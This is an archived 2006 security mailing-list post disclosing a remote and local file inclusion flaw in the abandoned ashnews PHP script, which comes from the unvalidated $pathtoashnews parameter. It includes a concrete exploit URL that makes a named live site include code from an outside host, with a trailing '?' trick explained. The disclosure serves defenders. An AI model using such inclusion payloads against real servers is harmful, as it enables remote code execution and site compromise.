| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Tue, 31 Jan 2006 10:43:19 +0000 From: DanB-FD <dan-fd@...ox.org> To: Dan B UK <dan-fd@...ox.org> Cc: zeus olimpusklan <zeus.olimpusklan@...il.com>, full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com, admin@...e-h.org, org@...urity.nnov.ru Subject: Re: ashnews Cross-Site Scripting Vulnerability Hi, Dan B UK wrote: > Due to the nature of the issue I am not disclosing the detail of it > until the writer of the software has updated it; maybe you could have > waited?? > > A vulnerability that allows privileges of the apache user within the > limitations of how much PHP has been locked down. Since the author of the product has got back to me with the following I think it is ok to disclose the issue now. "That is a known error. Unfortunately I have completely abondoned ashnews. In fact, I have been neglecting taking it down completely which I am going to do right now. - Derek" The issue is in the handling of the $pathtoashnews, it is not validated before being used by the script. Allowing remote or local file inclusion. eg: http://dosko.nl/news/ashnews.php?pathtoashnews=http://f-box.org/~dan/inc.inc? ( The ? is required to make the remote server (f-box.org) ignore the string that is appended to the variable $pathtoashnews ) ( The website that is in the example above has already been defaced! ) Cheers, DanB UK. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists